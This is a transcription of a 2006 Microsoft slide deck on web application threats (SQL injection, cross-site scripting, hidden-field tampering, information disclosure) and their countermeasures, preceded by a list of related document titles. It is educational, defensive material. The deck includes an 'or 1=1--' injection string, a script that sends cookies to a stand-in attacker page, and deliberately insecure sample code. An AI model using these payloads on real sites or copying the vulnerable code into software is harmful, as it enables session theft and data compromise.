Security: Threats and Countermeasures. Stanley Tan Academic Program Manager Microsoft Singapore

Similar documents
WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang


Attacks Against Websites. Tom Chothia Computer Security, Lecture 11

Application Layer Attacks. Application Layer Attacks. Application Layer. Application Layer. Internet Protocols. Application Layer.

Ethical Hacking and Countermeasures: Web Applications, Second Edition. Chapter 3 Web Application Vulnerabilities

W e b A p p l i c a t i o n S e c u r i t y : T h e D e v i l i s i n t h e D e t a i l s

Computer Forensics: Investigating Network Intrusions and Cyber Crime, 2nd Edition. Chapter 3 Investigating Web Attacks

Copyright

Web basics: HTTP cookies

How is state managed in HTTP sessions. Web basics: HTTP cookies. Hidden fields (2) The principle. Disadvantage of this approach

Excerpts of Web Application Security focusing on Data Validation. adapted for F.I.S.T. 2004, Frankfurt

Information Security CS 526 Topic 11

P2_L12 Web Security Page 1

Exploiting and Defending: Common Web Application Vulnerabilities

Web insecurity Security strategies General security Listing of server-side risks Language specific security. Web Security.

Application Security Introduction. Tara Gu IBM Product Security Incident Response Team

Web basics: HTTP cookies

Computer Security 3e. Dieter Gollmann. Chapter 18: 1


Types of XSS attacks. Persistent XSS. Non-persistent XSS

NET 311 INFORMATION SECURITY

Security for the Web. Thanks to Dave Levin for some slides

THREAT MODELING IN SOCIAL NETWORKS. Molulaqhooa Maoyi Rotondwa Ratshidaho Sanele Macanda

CS 161 Computer Security

Web Application Security. Philippe Bogaerts

Information Security CS 526 Topic 8

e-commerce Study Guide Test 2. Security Chapter 10

Security for the Web. Thanks to Dave Levin for some slides

OWASP TOP Release. Andy Willingham June 12, 2018 OWASP Cincinnati

Security and Privacy

OWASP Top 10 Risks. Many thanks to Dave Wichers & OWASP

2/16/18. CYSE 411/AIT 681 Secure Software Engineering. Secure Coding. The Web. Topic #11. Web Security. Instructor: Dr. Kun Sun

DEFENSIVE PROGRAMMING. Lecture for EDA 263 Magnus Almgren Department of Computer Science and Engineering Chalmers University of Technology

Security+ Guide to Network Security Fundamentals, Third Edition. Chapter 3 Protecting Systems

Security Course. WebGoat Lab sessions

Web Security Computer Security Peter Reiher December 9, 2014

Web Security. Jace Baker, Nick Ramos, Hugo Espiritu, Andrew Le

Progress Exchange June, Phoenix, AZ, USA 1

WEB SECURITY: XSS & CSRF

Application vulnerabilities and defences

Curso: Ethical Hacking and Countermeasures

CS 155 Project 2. Overview & Part A

WebGoat Lab session overview

2/16/18. Secure Coding. CYSE 411/AIT 681 Secure Software Engineering. Web Security Outline. The Web. The Web, Basically.

Drone /12/2018. Threat Model. Description. Threats. Threat Source Risk Status Date Created

Homework 5: Exam Review

The security of Mozilla Firefox s Extensions. Kristjan Krips

Introduction to Ethical Hacking

Presented By Rick Deacon DEFCON 15 August 3-5, 2007

5/19/2015. Objectives. JavaScript, Sixth Edition. Saving State Information with Query Strings. Understanding State Information

Application Security through a Hacker s Eyes James Walden Northern Kentucky University

Lecture Overview. IN5290 Ethical Hacking

Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks

Avoiding Web Application Flaws In Embedded Devices. Jake Edge LWN.net URL for slides:

SECURE CODING ESSENTIALS

Certified Secure Web Application Engineer

MWR InfoSecurity Advisory. 26 th April Elastic Path Administrative. Quit. Session Hijacking through Embedded XSS

Security and Privacy. SWE 432, Fall 2016 Design and Implementation of Software for the Web

Bank Infrastructure - Video - 1

Application Layer Security

CSCE 813 Internet Security Case Study II: XSS

Web Security: Web Application Security [continued]

Web Attacks CMSC 414. September 25 & 27, 2017

Perslink Security. Perslink Security. Eleonora Petridou Pascal Cuylaerts. System And Network Engineering University of Amsterdam.

Web Gate Keeper: Detecting Encroachment in Multi-tier Web Application

CIS 4360 Secure Computer Systems XSS

MVC :: Preventing JavaScript Injection Attacks. What is a JavaScript Injection Attack?

John Coggeshall Copyright 2006, Zend Technologies Inc.

shortcut Tap into learning NOW! Visit for a complete list of Short Cuts. Your Short Cut to Knowledge

Web Applilicati tion S i ecur t ity SIRT Se u c i r ty ity T a r i aining April 9th, 2009

Common Websites Security Issues. Ziv Perry

CSCD 303 Essential Computer Security Fall 2018

Security Engineering by Ross Andersson Chapter 18. API Security. Presented by: Uri Ariel Nepomniashchy 31/05/2016

SPOOFING. Information Security in Systems & Networks Public Development Program. Sanjay Goel University at Albany, SUNY Fall 2006

Web 2.0 and AJAX Security. OWASP Montgomery. August 21 st, 2007

OWASP Top 10. Copyright 2017 Ergon Informatik AG 2/13

GCIH. GIAC Certified Incident Handler.

Web Application & Web Server Vulnerabilities Assessment Pankaj Sharma

Top 10 Application Security Vulnerabilities in Web.config Files Part One

SINGLE COURSE. NH9000 Certified Ethical Hacker 104 Total Hours. COURSE TITLE: Certified Ethical Hacker

Secure coding practices

Web Application Attacks

Lecture 9a: Sessions and Cookies

Web Application with AJAX. Kateb, Faris; Ahmed, Mohammed; Alzahrani, Omar. University of Colorado, Colorado Springs

Project 2: Web Security

last time: command injection

Assignment 6: Web Security

Test Harness for Web Application Attacks

PHP Security. Kevin Schroeder Zend Technologies. Copyright 2007, Zend Technologies Inc.

CSE361 Web Security. Attacks against the server-side of web applications. Nick Nikiforakis

CSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis

OWASP Thailand. Proxy Caches and Web Application Security. OWASP AppSec Asia October 21, Using the Recent Google Docs 0-Day as an Example

Web Application Security

Sichere Software vom Java-Entwickler

Andrew Muller, Canberra Managing Director, Ionize, Canberra The challenges of Security Testing. Security Testing. Taming the Wild West

Web security: an introduction to attack techniques and defense methods

Your Turn to Hack the OWASP Top 10!

Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any

Kenna Platform Security. A technical overview of the comprehensive security measures Kenna uses to protect your data

Module 1: Penetration Testing Planning and Scoping. Module 2: Basic Usage of Linux and its services

Transcription:

Security: Threats and Countermeasures Stanley Tan Academic Program Manager Microsoft Singapore

Session Agenda Types of threats Threats against the application Countermeasures against the threats

Types of Threats Threats against the network Spoofed packets, etc. Network Host Application Threats against the host Buffer overflows, illicit paths, etc. Threats against the application SQL injection, XSS, input tampering, etc.

Threats Against the Application Threat SQL injection Cross-site scripting Hidden-field tampering Eavesdropping Session hijacking Identity spoofing Information disclosure Examples Including a DROP TABLE command in text typed into an input field Using malicious client-side script to steal cookies Maliciously changing the value of a hidden field Using a packet sniffer to steal passwords and cookies from traffic on unencrypted connections Using a stolen session ID cookie to access someone else's session state Using a stolen forms authentication cookie to pose as another user Allowing client to see a stack trace when an unhandled exception occurs i http://msdn.microsoft.com/library/en-us/dnnetsec/html/thcmch10.asp? frame=true#c10618429_004

SQL Injection Exploits applications that use external input in database commands Input from <form> fields Input from query strings The technique: Find a <form> field or query string parameter used to generate SQL commands Submit input that modifies the commands Compromise, corrupt, and destroy data

SQL Injection

How SQL Injection Works Model Query SELECT COUNT (*) FROM Users WHERE UserName= Jeff AND Password= imbatman Malicious Query SELECT COUNT (*) FROM Users WHERE UserName= or 1=1-- AND Password= "or 1=1" matches every record in the table "--" comments out the remainder of the query

Accessing Data Securely Use stored procedures or parameterized commands in lieu of dynamic SQL commands Never use sa to access Web databases Store connection strings securely Apply administrative protections to SQL Server 8 Optionally use SSL/TLS or IPSec to secure the connection to the database server 2,9 i http://msdn.microsoft.com/library/en-us/dnnetsec/html/thcmch14.asp

Dynamic SQL Commands Vulnerable to SQL injection attacks // DANGER! User input used to generate database query string sql = String.Format ("select count (*) " + "from users where username=\'{0}\' and cast " + "(password as varbinary)=cast (\'{1}\' as " + varbinary)", username, password); SqlCommand command = new SqlCommand (sql, connection); int count = (int) command.executescalar ();

Parameterized Commands Less vulnerable to SQL injection attacks // BETTER: Input passed to parameterized command SqlCommand command = new SqlCommand ("select count (*) from users where " + "username=@username and cast (password as " + "varbinary)=cast (@password as varbinary)", connection); command.parameters.add ("@username", SqlDbType.VarChar).Value = username; command.parameters.add ("@password", SqlDbType.VarChar).Value = password; int count = (int) command.executescalar ();

YASID Why you really want to secure yourself against SQL injection attacks

Cross-Site Scripting (XSS) Exploits applications that echo raw, unfiltered input to Web pages Input from <form> fields Input from query strings The technique: Find a <form> field or query string parameter whose value is echoed to the Web page Enter malicious script and get an unwary user to navigate to the infected page Steal cookies, deface and disable sites

How Cross-Site Scripting Works URL of the site targeted by the attack <a href="http:// /Search.aspx? Search=<script language='javascript'> document.location.replace ('http://localhost/evilpage.aspx? Cookie= + document.cookie); </script>"> </a> Query string contains embedded JavaScript that redirects to attacker s page and transmits cookies issued by Search.aspx in a query string

Cross-Site Scripting

Validating Input Filter potentially injurious characters and strings HTML-encode all input echoed to a Web page Use "safe" character encodings <globalization requestencoding="iso-8859-1" responseencoding="iso-8859-1" /> Avoid using file names as input if possible i http://msdn.microsoft.com/library/en-us/dnnetsec/html/thcmch10.asp? frame=true#c10618429_006

Anti-XSS Library Download from MSDN: http://www.microsoft.com/downloads/deta ils.aspx?familyid=9a2b9c92-7ad9-496c- 9A89-AF08DE2E5982&displaylang=en The Anti-Cross Site Scripting Library can be used to provide comprehensive protection to Web-based applications against Cross-Site Scripting (XSS) attacks.

Input Validation Why you shouldn t use file names as input

Hidden-Field Tampering HTTP is a stateless protocol No built-in way to persist data from one request to the next People are stateful beings Want data persisted between requests Shopping carts, user preferences, etc. Web developers sometimes use hidden fields to persist data between requests Hidden fields are not really hidden!

How HF Tampering Works Page contains this <input type= hidden name="price" value="$10,000"> Postback data should contain this price="$10,000" Instead it contains this price="$1" type="hidden" prevents the field from being seen on the page but not in View Source

Information Disclosure Which is the better error message?

Information Disclosure

This is Insecure Code! <html> <body> <form runat="server"> <asp:textbox ID="Input" runat="server" /> <asp:button Text="Click Me" OnClick="OnSubmit" runat="server" /> <asp:label ID="Output" runat="server" /> </form> </body> </html> <script language="c#" runat="server"> void OnSubmit (Object sender, EventArgs e) { Output.Text = "Hello, " + Input.Text; } </script>

Why is This Code Insecure? <html> <body> <form runat="server"> <asp:textbox ID="Input" runat="server" /> <asp:button Text="Click Me" OnClick="OnSubmit" runat="server" /> <asp:label ID="Output" runat="server" /> </form> </body> </html> <script language="c#" runat="server"> void OnSubmit (Object sender, EventArgs e) { Output.Text = "Hello, " + Input.Text; } </script> Input is echoed to page without HTML encoding Input is neither validated nor constrained; user can type anything!

2006 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback